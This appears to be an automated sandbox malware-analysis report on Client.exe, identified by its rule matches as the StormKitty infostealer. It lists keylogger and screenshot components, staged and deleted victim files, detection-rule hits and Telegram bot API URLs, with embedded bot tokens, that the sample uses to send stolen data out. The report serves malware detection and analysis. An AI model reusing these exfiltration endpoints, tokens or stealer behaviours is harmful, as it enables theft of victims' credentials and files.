                                  Source: Client.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                                  Source: Client.exe, 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                  Source: Client.exe, 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                  Source: Client.exeString found in binary or memory: https://api.telegram.org/bot
                                  Source: Client.exeString found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send
                                  Source: Client.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096
                                  Source: Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619
                                  Source: Client.exe, 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=16191
                                  Source: Client.exeString found in binary or memory: https://api.telegram.org/file/bot
                                  Source: Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD
                                  Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                  Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                  Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                  Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                  Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                  Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                  Source: Client.exeString found in binary or memory: https://github.com/LimerBoy/StormKitty
                                  Source: Client.exe, 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty0&
                                  Source: Client.exeString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
                                  Source: tmpE267.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org
                                  Source: tmpE267.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                  Source: tmpE267.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                                  Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                                  Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                  Source: places.raw.0.dr, tmpE267.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org
                                  Source: tmpE267.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org#
                                  Source: tmpE267.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                                  Source: tmpE267.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                                  Source: tmpE267.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                                  Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.6:49712 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49714 version: TLS 1.2

                                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                                  barindex
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR
                                  Source: Client.exe, DesktopScreenshot.cs.Net Code: Make
                                  Source: Client.exe, Keylogger.cs.Net Code: SetHook
                                  Source: Client.exe, Keylogger.cs.Net Code: KeyboardLayout

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Source: C:\Users\user\Desktop\Client.exeFile deleted: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GAOBCVIQIJ.xlsxJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile deleted: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LSBIHQFDVT\EFOYFBOLXA.jpgJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile deleted: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL\SFPUSAFIOL.docxJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile deleted: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY\GAOBCVIQIJ.pdfJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile deleted: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LSBIHQFDVT\BNAGMGSPLO.pdfJump to behavior

                                  System Summary

                                  barindex
                                  Source: Client.exe, type: SAMPLEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                  Source: Client.exe, type: SAMPLEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: Client.exe, type: SAMPLEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                                  Source: Client.exe, type: SAMPLEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                  Source: Client.exe, type: SAMPLEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                                  Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                  Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                                  Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                  Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                                  Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                  Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                  Source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_016B63780_2_016B6378
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_016B5AA80_2_016B5AA8
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_016B57600_2_016B5760
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_016B97400_2_016B9740
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_016B97300_2_016B9730
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_05C705F00_2_05C705F0
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_05C706000_2_05C70600
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_05C7C1080_2_05C7C108
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_05C7C0F70_2_05C7C0F7
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_05C75D520_2_05C75D52
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_05C75D600_2_05C75D60
                                  Source: Client.exe, 00000000.00000002.4562029762.000000000142E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Client.exe
                                  Source: Client.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: Client.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: Client.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                                  Source: Client.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                  Source: Client.exe, type: SAMPLEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                                  Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                                  Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                  Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                                  Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: Client.exe, Settings.csBase64 encoded string: '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
                                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@17/139@4/4
                                  Source: C:\Users\user\Desktop\Client.exeFile created: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeMutant created: NULL
                                  Source: C:\Users\user\Desktop\Client.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
                                  Source: C:\Users\user\Desktop\Client.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE154.tmpJump to behavior
                                  Source: Client.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: Client.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
